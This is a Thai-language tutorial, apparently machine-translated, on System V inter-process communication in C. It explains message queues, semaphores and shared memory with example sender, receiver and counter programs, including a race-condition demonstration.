  • อาร์กิวเมนต์ที่สอง msgp เป็นตัวชี้ของข้อความที่ได้รับจากผู้โทร ถูกกำหนดไว้ในโครงสร้างของรูปแบบต่อไปนี้ -

struct msgbuf {
   long mtype;
   char mtext[1];
};

ตัวแปร mtype ใช้สำหรับการสื่อสารกับข้อความประเภทต่างๆ ตัวแปร mtext คืออาร์เรย์หรือโครงสร้างอื่น ๆ ที่ระบุขนาดโดย msgsz (ค่าบวก) หากไม่ได้กล่าวถึงช่อง mtext จะถือว่าเป็นข้อความขนาดศูนย์ซึ่งได้รับอนุญาต

  • อาร์กิวเมนต์ที่สาม msgsz คือขนาดของข้อความที่ได้รับ (ข้อความควรลงท้ายด้วยอักขระ null)

  • อาร์กิวเมนต์ fouth ประเภท msg ระบุประเภทของข้อความ -

    • If msgtype is 0 - อ่านข้อความแรกที่ได้รับในคิว

    • If msgtype is +ve - อ่านข้อความแรกในคิวของประเภท msgtype (ถ้า msgtype คือ 10 จากนั้นอ่านเฉพาะข้อความแรกของประเภท 10 แม้ว่าประเภทอื่นอาจอยู่ในคิวตอนต้น)

    • If msgtype is –ve - อ่านข้อความแรกของประเภทต่ำสุดที่น้อยกว่าหรือเท่ากับค่าสัมบูรณ์ของประเภทข้อความ (เช่นถ้า msgtype เป็น -5 จะอ่านข้อความแรกของประเภทที่น้อยกว่า 5 เช่นประเภทข้อความตั้งแต่ 1 ถึง 5)

  • อาร์กิวเมนต์ที่ห้า msgflg ระบุแฟล็กบางอย่างเช่น IPC_NOWAIT (ส่งกลับทันทีเมื่อไม่พบข้อความในคิวหรือ MSG_NOERROR (ตัดทอนข้อความหากมีมากกว่า msgsz ไบต์)

การเรียกนี้จะส่งคืนจำนวนไบต์ที่ได้รับจริงในอาร์เรย์ mtext เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgctl(int msgid, int cmd, struct msqid_ds *buf)

การเรียกระบบนี้ดำเนินการควบคุมคิวข้อความ (System V) ต่อไปนี้อาร์กิวเมนต์จะต้องผ่าน -

  • อาร์กิวเมนต์แรก msgid รู้จักคิวข้อความเช่นตัวระบุคิวข้อความ ค่าตัวระบุจะได้รับเมื่อสำเร็จของ msgget ()

  • อาร์กิวเมนต์ที่สอง cmd เป็นคำสั่งในการดำเนินการควบคุมที่จำเป็นบนคิวข้อความ ค่าที่ถูกต้องสำหรับ cmd คือ -

IPC_STAT- คัดลอกข้อมูลของค่าปัจจุบันของแต่ละสมาชิกของ struct msqid_ds ไปยังโครงสร้างที่ส่งผ่านที่ชี้โดย buf คำสั่งนี้ต้องการสิทธิ์ในการอ่านบนคิวข้อความ

IPC_SET - ตั้งค่า ID ผู้ใช้ ID กลุ่มของเจ้าของสิทธิ์ ฯลฯ ที่ชี้ไปตามโครงสร้าง buf

IPC_RMID - ลบคิวข้อความทันที

IPC_INFO - ส่งคืนข้อมูลเกี่ยวกับขีด จำกัด คิวข้อความและพารามิเตอร์ในโครงสร้างที่ชี้โดย buf ซึ่งเป็นประเภท struct msginfo

MSG_INFO - ส่งคืนโครงสร้าง msginfo ที่มีข้อมูลเกี่ยวกับทรัพยากรระบบที่ใช้โดยคิวข้อความ

  • อาร์กิวเมนต์ที่สาม buf เป็นตัวชี้ไปยังโครงสร้างคิวข้อความที่ชื่อ struct msqid_ds ค่าของโครงสร้างนี้จะถูกใช้สำหรับ set หรือ get ตาม cmd

การเรียกนี้จะคืนค่าโดยขึ้นอยู่กับคำสั่งที่ผ่าน ความสำเร็จของ IPC_INFO และ MSG_INFO หรือ MSG_STAT ส่งคืนดัชนีหรือตัวระบุของคิวข้อความหรือ 0 สำหรับการดำเนินการอื่น ๆ และ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

เมื่อได้เห็นข้อมูลพื้นฐานและการโทรของระบบเกี่ยวกับคิวข้อความแล้วตอนนี้ก็ถึงเวลาตรวจสอบกับโปรแกรม

ให้เราดูคำอธิบายก่อนดูโปรแกรม -

Step 1 - สร้างสองกระบวนการหนึ่งสำหรับการส่งไปยังคิวข้อความ (msgq_send.c) และอีกกระบวนการหนึ่งสำหรับการดึงข้อมูลจากคิวข้อความ (msgq_recv.c)

Step 2- การสร้างคีย์โดยใช้ฟังก์ชัน ftok () สำหรับสิ่งนี้ในตอนแรกไฟล์ msgq.txt ถูกสร้างขึ้นเพื่อรับคีย์เฉพาะ

Step 3 - ขั้นตอนการส่งดำเนินการดังต่อไปนี้

  • อ่านอินพุตสตริงจากผู้ใช้

  • ลบบรรทัดใหม่หากมีอยู่

  • ส่งเข้าสู่คิวข้อความ

  • ทำซ้ำกระบวนการจนกว่าจะสิ้นสุดการป้อนข้อมูล (CTRL + D)

  • เมื่อได้รับข้อมูลสิ้นสุดแล้วให้ส่งข้อความ“ end” เพื่อแสดงว่าสิ้นสุดกระบวนการ

Step 4 - ในขั้นตอนการรับให้ดำเนินการดังต่อไปนี้

  • อ่านข้อความจากคิว
  • แสดงผลลัพธ์
  • หากข้อความที่ได้รับคือ“ สิ้นสุด” ให้เสร็จสิ้นกระบวนการและออก

เพื่อให้ง่ายขึ้นเราไม่ได้ใช้ประเภทข้อความสำหรับตัวอย่างนี้ นอกจากนี้กระบวนการหนึ่งกำลังเขียนลงในคิวและอีกกระบวนการหนึ่งกำลังอ่านจากคิว สิ่งนี้สามารถขยายได้ตามต้องการกล่าวคือกระบวนการหนึ่งจะเขียนลงในคิวและหลายกระบวนการอ่านจากคิว

ตอนนี้ให้เราตรวจสอบกระบวนการ (การส่งข้อความเข้าสู่คิว) - ไฟล์: msgq_send.c

/* Filename: msgq_send.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define PERMS 0644
struct my_msgbuf {
   long mtype;
   char mtext[200];
};

int main(void) {
   struct my_msgbuf buf;
   int msqid;
   int len;
   key_t key;
   system("touch msgq.txt");
   
   if ((key = ftok("msgq.txt", 'B')) == -1) {
      perror("ftok");
      exit(1);
   }
   
   if ((msqid = msgget(key, PERMS | IPC_CREAT)) == -1) {
      perror("msgget");
      exit(1);
   }
   printf("message queue: ready to send messages.\n");
   printf("Enter lines of text, ^D to quit:\n");
   buf.mtype = 1; /* we don't really care in this case */
   
   while(fgets(buf.mtext, sizeof buf.mtext, stdin) != NULL) {
      len = strlen(buf.mtext);
      /* remove newline at end, if it exists */
      if (buf.mtext[len-1] == '\n') buf.mtext[len-1] = '\0';
      if (msgsnd(msqid, &buf, len+1, 0) == -1) /* +1 for '\0' */
      perror("msgsnd");
   }
   strcpy(buf.mtext, "end");
   len = strlen(buf.mtext);
   if (msgsnd(msqid, &buf, len+1, 0) == -1) /* +1 for '\0' */
   perror("msgsnd");
   
   if (msgctl(msqid, IPC_RMID, NULL) == -1) {
      perror("msgctl");
      exit(1);
   }
   printf("message queue: done sending messages.\n");
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

message queue: ready to send messages.
Enter lines of text, ^D to quit:
this is line 1
this is line 2
message queue: done sending messages.

ต่อไปนี้เป็นรหัสจากกระบวนการรับข้อความ (การดึงข้อความจากคิว) - ไฟล์: msgq_recv.c

/* Filename: msgq_recv.c */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define PERMS 0644
struct my_msgbuf {
   long mtype;
   char mtext[200];
};

int main(void) {
   struct my_msgbuf buf;
   int msqid;
   int toend;
   key_t key;
   
   if ((key = ftok("msgq.txt", 'B')) == -1) {
      perror("ftok");
      exit(1);
   }
   
   if ((msqid = msgget(key, PERMS)) == -1) { /* connect to the queue */
      perror("msgget");
      exit(1);
   }
   printf("message queue: ready to receive messages.\n");
   
   for(;;) { /* normally receiving never ends but just to make conclusion 
             /* this program ends wuth string of end */
      if (msgrcv(msqid, &buf, sizeof(buf.mtext), 0, 0) == -1) {
         perror("msgrcv");
         exit(1);
      }
      printf("recvd: \"%s\"\n", buf.mtext);
      toend = strcmp(buf.mtext,"end");
      if (toend == 0)
      break;
   }
   printf("message queue: done receiving messages.\n");
   system("rm msgq.txt");
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

message queue: ready to receive messages.
recvd: "this is line 1"
recvd: "this is line 2"
recvd: "end"
message queue: done receiving messages.

คำถามแรกที่อยู่ในใจคือทำไมเราต้องมีเซมาโฟร์? คำตอบง่ายๆเพื่อปกป้องภูมิภาคสำคัญ / ร่วมกันระหว่างกระบวนการต่างๆ

สมมติว่ากระบวนการต่างๆกำลังใช้รหัสภูมิภาคเดียวกันและหากทุกคนต้องการเข้าถึงแบบขนานผลลัพธ์จะซ้อนทับกัน ตัวอย่างเช่นผู้ใช้หลายคนกำลังใช้เครื่องพิมพ์เพียงเครื่องเดียว (ส่วนทั่วไป / ส่วนสำคัญ) เช่นผู้ใช้ 3 คนรับงาน 3 งานในเวลาเดียวกันหากงานทั้งหมดเริ่มต้นพร้อมกันเอาต์พุตของผู้ใช้หนึ่งรายการจะซ้อนทับกับอีกเครื่องหนึ่ง ดังนั้นเราจำเป็นต้องป้องกันโดยใช้เซมาโฟเรสนั่นคือล็อกส่วนวิกฤตเมื่อกระบวนการหนึ่งกำลังทำงานและปลดล็อกเมื่อเสร็จสิ้น สิ่งนี้จะเกิดขึ้นซ้ำสำหรับผู้ใช้ / กระบวนการแต่ละรายการเพื่อไม่ให้งานหนึ่งทับซ้อนกับงานอื่น

โดยทั่วไป semaphores แบ่งออกเป็นสองประเภท -

Binary Semaphores - มีเพียงสองสถานะ 0 & 1 เท่านั้น ได้แก่ ล็อก / ปลดล็อกหรือพร้อมใช้งาน / ไม่พร้อมใช้งานการใช้งาน Mutex

Counting Semaphores - Semaphores ที่อนุญาตให้มีการนับทรัพยากรโดยพลการเรียกว่าการนับ semaphores

สมมติว่าเรามีเครื่องพิมพ์ 5 เครื่อง (ให้เข้าใจสมมติว่าเครื่องพิมพ์ 1 เครื่องรับงานได้ 1 งานเท่านั้น) และมีงานให้พิมพ์ 3 งาน ตอนนี้จะได้รับ 3 งานสำหรับเครื่องพิมพ์ 3 เครื่อง (งานละ 1 เครื่อง) อีก 4 งานเข้ามาในขณะที่กำลังดำเนินการ ตอนนี้มีเครื่องพิมพ์จาก 2 เครื่องมีกำหนดงาน 2 งานและเราเหลืองานอีก 2 งานซึ่งจะเสร็จสมบูรณ์หลังจากที่มีทรัพยากร / เครื่องพิมพ์เครื่องใดเครื่องหนึ่งเท่านั้น การจัดกำหนดการแบบนี้ตามความพร้อมของทรัพยากรสามารถดูได้ว่าเป็นการนับเซมาโฟร์

ในการซิงโครไนซ์โดยใช้เซมาโฟร์ให้ทำตามขั้นตอนต่อไปนี้ -

Step 1 - สร้างสัญญาณหรือเชื่อมต่อกับสัญญาณที่มีอยู่แล้ว (semget ())

Step 2 - ดำเนินการกับสัญญาณเช่นจัดสรรหรือปล่อยหรือรอทรัพยากร (semop ())

Step 3 - ดำเนินการควบคุมบนคิวข้อความ (semctl ())

ตอนนี้ให้เราตรวจสอบสิ่งนี้กับระบบที่เรามี

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>

int semget(key_t key, int nsems, int semflg)

การเรียกระบบนี้สร้างหรือจัดสรรชุดเซมาฟอร์ System V จำเป็นต้องส่งผ่านอาร์กิวเมนต์ต่อไปนี้ -

  • อาร์กิวเมนต์แรกคีย์จดจำคิวข้อความ คีย์อาจเป็นได้ทั้งค่าตามอำเภอใจหรือค่าที่ได้มาจากฟังก์ชันไลบรารี ftok ()

  • อาร์กิวเมนต์ที่สอง nsems ระบุจำนวนของ semaphores ถ้าไบนารีเป็น 1 แสดงว่าต้องมีชุดเซมาฟอร์ 1 ชุดหรือตามจำนวนชุดเซมาฟอร์ที่ต้องการ

  • อาร์กิวเมนต์ที่สาม semflg ระบุแฟล็ก / s เซมาฟอร์ที่ต้องการเช่น IPC_CREAT (การสร้างเซมาฟอร์หากไม่มีอยู่) หรือ IPC_EXCL (ใช้กับ IPC_CREAT เพื่อสร้างเซมาฟอร์และการเรียกล้มเหลวหากมีเซมาฟอร์อยู่แล้ว) จำเป็นต้องผ่านการอนุญาตเช่นกัน

Note - ดูส่วนก่อนหน้าสำหรับรายละเอียดเกี่ยวกับสิทธิ์

การเรียกนี้จะส่งคืนตัวระบุเซมาฟอร์ที่ถูกต้อง (ใช้สำหรับการเรียกเซมาโฟร์ต่อไป) เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

ข้อผิดพลาดต่างๆเกี่ยวกับการเรียกนี้ ได้แก่ EACCESS (การอนุญาตถูกปฏิเสธ) EEXIST (ไม่สามารถสร้างคิวได้แล้ว) ENOENT (ไม่มีคิว) ENOMEM (หน่วยความจำไม่เพียงพอที่จะสร้างคิว) ENOSPC (ขีด จำกัด ชุดสูงสุด เกิน) ฯลฯ

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>

int semop(int semid, struct sembuf *semops, size_t nsemops)

การเรียกระบบนี้ดำเนินการบนชุดเซมาฟอร์ System V ได้แก่ จัดสรรทรัพยากรรอทรัพยากรหรือปลดปล่อยทรัพยากร ต่อไปนี้อาร์กิวเมนต์จะต้องผ่าน -

  • อาร์กิวเมนต์แรก semid ระบุตัวระบุชุดเซมาฟอร์ที่สร้างโดย semget ()

  • อาร์กิวเมนต์ที่สอง semops เป็นตัวชี้ไปยังอาร์เรย์ของการดำเนินการที่จะดำเนินการบนชุดเซมาฟอร์ โครงสร้างมีดังนี้ -

struct sembuf {
   unsigned short sem_num; /* Semaphore set num */
   short sem_op; /* Semaphore operation */
   short sem_flg; /* Operation flags, IPC_NOWAIT, SEM_UNDO */
};

องค์ประกอบ sem_op ในโครงสร้างด้านบนระบุการดำเนินการที่ต้องดำเนินการ -

  • ถ้า sem_op เป็น –ve ให้จัดสรรหรือรับทรัพยากร บล็อกกระบวนการเรียกจนกว่ากระบวนการอื่น ๆ จะได้รับการปลดปล่อยทรัพยากรเพียงพอเพื่อให้กระบวนการนี้สามารถจัดสรรได้

  • ถ้า sem_op เป็นศูนย์กระบวนการเรียกจะรอหรือพักจนกว่าค่าเซมาฟอร์จะถึง 0

  • ถ้า sem_op เป็น + ve ปล่อยทรัพยากร

ตัวอย่างเช่น -

โครงสร้าง sembuf sem_lock = {0, -1, SEM_UNDO};

โครงสร้าง sembuf sem_unlock = {0, 1, SEM_UNDO};

  • อาร์กิวเมนต์ที่สาม nsemops คือจำนวนการดำเนินการในอาร์เรย์นั้น

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>

int semctl(int semid, int semnum, int cmd, …)

การเรียกระบบนี้ดำเนินการควบคุมเซมาฟอร์ System V จำเป็นต้องส่งผ่านอาร์กิวเมนต์ต่อไปนี้ -

  • อาร์กิวเมนต์แรก semid คือตัวระบุของเซมาฟอร์ id นี้คือตัวระบุเซมาฟอร์ซึ่งเป็นค่าส่งคืนของการเรียกระบบ semget ()

  • อาร์กิวเมนต์ที่สอง semnum คือจำนวนเซมาฟอร์ semaphores มีจำนวนตั้งแต่ 0

  • อาร์กิวเมนต์ที่สาม cmd เป็นคำสั่งเพื่อดำเนินการควบคุมที่จำเป็นบนเซมาฟอร์

  • อาร์กิวเมนต์ที่สี่ประเภทยูเนี่ยนเซมุนขึ้นอยู่กับ cmd ในบางกรณีอาร์กิวเมนต์ที่สี่จะใช้ไม่ได้

ให้เราตรวจสอบเซมุนสหภาพ -

union semun {
   int val; /* val for SETVAL */
   struct semid_ds *buf; /* Buffer for IPC_STAT and IPC_SET */
   unsigned short *array; /* Buffer for GETALL and SETALL */
   struct seminfo *__buf; /* Buffer for IPC_INFO and SEM_INFO*/
};

โครงสร้างข้อมูล semid_ds ซึ่งกำหนดไว้ใน sys / sem.h มีดังนี้ -

struct semid_ds {
   struct ipc_perm sem_perm; /* Permissions */
   time_t sem_otime; /* Last semop time */
   time_t sem_ctime; /* Last change time */
   unsigned long sem_nsems; /* Number of semaphores in the set */
};

Note - โปรดดูหน้าคู่มือสำหรับโครงสร้างข้อมูลอื่น ๆ

สหภาพเซมุนอาร์กิวเมนต์; ค่าที่ถูกต้องสำหรับ cmd คือ -

  • IPC_STAT- คัดลอกข้อมูลของค่าปัจจุบันของสมาชิกแต่ละคนของ struct semid_ds ไปยังโครงสร้างที่ส่งผ่านที่ชี้โดย arg.buf คำสั่งนี้ต้องการสิทธิ์ในการอ่านสำหรับเซมาฟอร์

  • IPC_SET - ตั้งค่า ID ผู้ใช้ ID กลุ่มของเจ้าของสิทธิ์ ฯลฯ ที่โครงสร้าง semid_ds ชี้ให้เห็น

  • IPC_RMID - ลบชุด semaphores

  • IPC_INFO - ส่งคืนข้อมูลเกี่ยวกับขีด จำกัด ของสัญญาณและพารามิเตอร์ในโครงสร้าง semid_ds ชี้โดย arg .__ buf

  • SEM_INFO - ส่งกลับโครงสร้าง seminfo ที่มีข้อมูลเกี่ยวกับทรัพยากรระบบที่ใช้โดยเซมาฟอร์

การเรียกนี้จะส่งคืนค่า (ค่าที่ไม่ใช่ค่าลบ) ขึ้นอยู่กับคำสั่งที่ผ่าน เมื่อสำเร็จ IPC_INFO และ SEM_INFO หรือ SEM_STAT จะส่งกลับดัชนีหรือตัวระบุของรายการที่ใช้สูงสุดตาม Semaphore หรือค่าของ semncnt สำหรับ GETPID หรือค่าของ semval สำหรับ GETVAL 0 สำหรับการดำเนินการอื่น ๆ ที่ประสบความสำเร็จและ - 1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

ก่อนดูโค้ดขอให้เราทำความเข้าใจกับการนำไปใช้งาน -

  • สร้างสองกระบวนการพูดว่าเด็กและผู้ปกครอง

  • สร้างหน่วยความจำแบบแบ่งใช้ส่วนใหญ่ที่จำเป็นในการจัดเก็บตัวนับและแฟล็กอื่น ๆ เพื่อระบุการสิ้นสุดกระบวนการอ่าน / เขียนลงในหน่วยความจำแบบแบ่งใช้

  • ตัวนับจะเพิ่มขึ้นโดยการนับโดยกระบวนการทั้งแม่และลูก การนับจะถูกส่งผ่านเป็นอาร์กิวเมนต์บรรทัดคำสั่งหรือใช้เป็นค่าเริ่มต้น (หากไม่ถูกส่งผ่านเป็นอาร์กิวเมนต์บรรทัดคำสั่งหรือค่าน้อยกว่า 10,000) เรียกว่ามีเวลานอนที่แน่นอนเพื่อให้แน่ใจว่าทั้งผู้ปกครองและเด็กเข้าถึงหน่วยความจำที่ใช้ร่วมกันในเวลาเดียวกันเช่นแบบขนาน

  • เนื่องจากตัวนับจะเพิ่มขึ้นในขั้นตอนที่ 1 โดยทั้งผู้ปกครองและลูกค่าสุดท้ายควรเป็นสองเท่าของตัวนับ เนื่องจากกระบวนการทั้งแม่และลูกที่ดำเนินการในเวลาเดียวกันตัวนับจะไม่เพิ่มขึ้นตามที่ต้องการ ดังนั้นเราต้องตรวจสอบให้แน่ใจว่ากระบวนการหนึ่งเสร็จสมบูรณ์ตามด้วยกระบวนการอื่น ๆ

  • การใช้งานทั้งหมดข้างต้นดำเนินการในไฟล์ shm_write_cntr.c

  • ตรวจสอบว่ามีการใช้ค่าตัวนับในไฟล์ shm_read_cntr.c หรือไม่

  • เพื่อให้แน่ใจว่าเสร็จสมบูรณ์โปรแกรม semaphore จะถูกนำไปใช้ในไฟล์ shm_write_cntr_with_sem.c ลบสัญญาณหลังจากเสร็จสิ้นกระบวนการทั้งหมด (หลังจากอ่านเสร็จจากโปรแกรมอื่น)

  • เนื่องจากเรามีไฟล์แยกต่างหากเพื่ออ่านค่าของตัวนับในหน่วยความจำที่ใช้ร่วมกันและไม่มีผลใด ๆ จากการเขียนโปรแกรมการอ่านยังคงเหมือนเดิม (shm_read_cntr.c)

  • การรันโปรแกรมเขียนในเทอร์มินัลเดียวและอ่านโปรแกรมจากเทอร์มินัลอื่นจะดีกว่าเสมอ เนื่องจากโปรแกรมจะดำเนินการเสร็จสิ้นหลังจากกระบวนการเขียนและการอ่านเสร็จสมบูรณ์แล้วจึงสามารถเรียกใช้โปรแกรมได้หลังจากเรียกใช้โปรแกรมเขียนอย่างสมบูรณ์ โปรแกรมเขียนจะรอจนกว่าโปรแกรมอ่านจะทำงานและเสร็จสิ้นหลังจากเสร็จสิ้นเท่านั้น

โปรแกรมที่ไม่มี semaphores

/* Filename: shm_write_cntr.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

#define SHM_KEY 0x12345
struct shmseg {
   int cntr;
   int write_complete;
   int read_complete;
};
void shared_memory_cntr_increment(int pid, struct shmseg *shmp, int total_count);

int main(int argc, char *argv[]) {
   int shmid;
   struct shmseg *shmp;
   char *bufptr;
   int total_count;
   int sleep_time;
   pid_t pid;
   if (argc != 2)
   total_count = 10000;
   else {
      total_count = atoi(argv[1]);
      if (total_count < 10000)
      total_count = 10000;
   }
   printf("Total Count is %d\n", total_count);
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);

   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }

   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   shmp->cntr = 0;
   pid = fork();

   /* Parent Process - Writing Once */
   if (pid > 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
   } else if (pid == 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
      return 0;
   } else {
      perror("Fork Failure\n");
      return 1;
   }
   while (shmp->read_complete != 1)
   sleep(1);

   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }

   if (shmctl(shmid, IPC_RMID, 0) == -1) {
      perror("shmctl");
      return 1;
   }
   printf("Writing Process: Complete\n");
   return 0;
}

/* Increment the counter of shared memory by total_count in steps of 1 */
void shared_memory_cntr_increment(int pid, struct shmseg *shmp, int total_count) {
   int cntr;
   int numtimes;
   int sleep_time;
   cntr = shmp->cntr;
   shmp->write_complete = 0;
   if (pid == 0)
   printf("SHM_WRITE: CHILD: Now writing\n");
   else if (pid > 0)
   printf("SHM_WRITE: PARENT: Now writing\n");
   //printf("SHM_CNTR is %d\n", shmp->cntr);
   
   /* Increment the counter in shared memory by total_count in steps of 1 */
   for (numtimes = 0; numtimes < total_count; numtimes++) {
      cntr += 1;
      shmp->cntr = cntr;
      
      /* Sleeping for a second for every thousand */
      sleep_time = cntr % 1000;
      if (sleep_time == 0)
      sleep(1);
   }
   
   shmp->write_complete = 1;
   if (pid == 0)
   printf("SHM_WRITE: CHILD: Writing Done\n");
   else if (pid > 0)
   printf("SHM_WRITE: PARENT: Writing Done\n");
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Total Count is 10000
SHM_WRITE: PARENT: Now writing
SHM_WRITE: CHILD: Now writing
SHM_WRITE: PARENT: Writing Done
SHM_WRITE: CHILD: Writing Done
Writing Process: Complete

ตอนนี้ให้เราตรวจสอบโปรแกรมการอ่านหน่วยความจำที่ใช้ร่วมกัน

/* Filename: shm_read_cntr.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>

#define SHM_KEY 0x12345
struct shmseg {
   int cntr;
   int write_complete;
   int read_complete;
};

int main(int argc, char *argv[]) {
   int shmid, numtimes;
   struct shmseg *shmp;
   int total_count;
   int cntr;
   int sleep_time;
   if (argc != 2)
   total_count = 10000;
   
   else {
      total_count = atoi(argv[1]);
      if (total_count < 10000)
      total_count = 10000;
   }
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   
   /* Read the shared memory cntr and print it on standard output */
   while (shmp->write_complete != 1) {
      if (shmp->cntr == -1) {
         perror("read");
         return 1;
      }
      sleep(3);
   }
   printf("Reading Process: Shared Memory: Counter is %d\n", shmp->cntr);
   printf("Reading Process: Reading Done, Detaching Shared Memory\n");
   shmp->read_complete = 1;
   
   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }
   printf("Reading Process: Complete\n");
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Reading Process: Shared Memory: Counter is 11000
Reading Process: Reading Done, Detaching Shared Memory
Reading Process: Complete

หากคุณสังเกตผลลัพธ์ข้างต้นตัวนับควรเป็น 20000 อย่างไรก็ตามเนื่องจากก่อนที่จะเสร็จสิ้นงานกระบวนการหนึ่งกระบวนการอื่น ๆ ก็กำลังประมวลผลแบบขนานเช่นกันค่าตัวนับจึงไม่เป็นไปตามที่คาดไว้ ผลลัพธ์จะแตกต่างกันไปในแต่ละระบบและจะแตกต่างกันไปตามแต่ละการดำเนินการ เพื่อให้แน่ใจว่าทั้งสองกระบวนการทำงานหลังจากเสร็จสิ้นภารกิจหนึ่งควรดำเนินการโดยใช้กลไกการซิงโครไนซ์

ตอนนี้ให้เราตรวจสอบแอปพลิเคชันเดียวกันโดยใช้ semaphores

Note - โปรแกรมการอ่านยังคงเหมือนเดิม

/* Filename: shm_write_cntr_with_sem.c */
#include<stdio.h>
#include<sys/types.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/sem.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

#define SHM_KEY 0x12345
#define SEM_KEY 0x54321
#define MAX_TRIES 20

struct shmseg {
   int cntr;
   int write_complete;
   int read_complete;
};
void shared_memory_cntr_increment(int, struct shmseg*, int);
void remove_semaphore();

int main(int argc, char *argv[]) {
   int shmid;
   struct shmseg *shmp;
   char *bufptr;
   int total_count;
   int sleep_time;
   pid_t pid;
   if (argc != 2)
   total_count = 10000;
   else {
      total_count = atoi(argv[1]);
      if (total_count < 10000)
      total_count = 10000;
   }
   printf("Total Count is %d\n", total_count);
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   
   if (shmp == (void *) -1) {
      perror("Shared memory attach: ");
      return 1;
   }
   shmp->cntr = 0;
   pid = fork();
   
   /* Parent Process - Writing Once */
   if (pid > 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
   } else if (pid == 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
      return 0;
   } else {
      perror("Fork Failure\n");
      return 1;
   }
   while (shmp->read_complete != 1)
   sleep(1);
   
   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }
   
   if (shmctl(shmid, IPC_RMID, 0) == -1) {
      perror("shmctl");
      return 1;
   }
   printf("Writing Process: Complete\n");
   remove_semaphore();
   return 0;
}

/* Increment the counter of shared memory by total_count in steps of 1 */
void shared_memory_cntr_increment(int pid, struct shmseg *shmp, int total_count) {
   int cntr;
   int numtimes;
   int sleep_time;
   int semid;
   struct sembuf sem_buf;
   struct semid_ds buf;
   int tries;
   int retval;
   semid = semget(SEM_KEY, 1, IPC_CREAT | IPC_EXCL | 0666);
   //printf("errno is %d and semid is %d\n", errno, semid);
   
   /* Got the semaphore */
   if (semid >= 0) {
      printf("First Process\n");
      sem_buf.sem_op = 1;
      sem_buf.sem_flg = 0;
      sem_buf.sem_num = 0;
      retval = semop(semid, &sem_buf, 1);
      if (retval == -1) {
         perror("Semaphore Operation: ");
         return;
      }
   } else if (errno == EEXIST) { // Already other process got it
      int ready = 0;
      printf("Second Process\n");
      semid = semget(SEM_KEY, 1, 0);
      if (semid < 0) {
         perror("Semaphore GET: ");
         return;
      }
      
      /* Waiting for the resource */
      sem_buf.sem_num = 0;
      sem_buf.sem_op = 0;
      sem_buf.sem_flg = SEM_UNDO;
      retval = semop(semid, &sem_buf, 1);
      if (retval == -1) {
         perror("Semaphore Locked: ");
         return;
      }
   }
   sem_buf.sem_num = 0;
   sem_buf.sem_op = -1; /* Allocating the resources */
   sem_buf.sem_flg = SEM_UNDO;
   retval = semop(semid, &sem_buf, 1);
   
   if (retval == -1) {
      perror("Semaphore Locked: ");
      return;
   }
   cntr = shmp->cntr;
   shmp->write_complete = 0;
   if (pid == 0)
   printf("SHM_WRITE: CHILD: Now writing\n");
   else if (pid > 0)
   printf("SHM_WRITE: PARENT: Now writing\n");
   //printf("SHM_CNTR is %d\n", shmp->cntr);
   
   /* Increment the counter in shared memory by total_count in steps of 1 */
   for (numtimes = 0; numtimes < total_count; numtimes++) {
      cntr += 1;
      shmp->cntr = cntr;
      /* Sleeping for a second for every thousand */
      sleep_time = cntr % 1000;
      if (sleep_time == 0)
      sleep(1);
   }
   shmp->write_complete = 1;
   sem_buf.sem_op = 1; /* Releasing the resource */
   retval = semop(semid, &sem_buf, 1);
   
   if (retval == -1) {
      perror("Semaphore Locked\n");
      return;
   }
   
   if (pid == 0)
      printf("SHM_WRITE: CHILD: Writing Done\n");
      else if (pid > 0)
      printf("SHM_WRITE: PARENT: Writing Done\n");
      return;
}
   
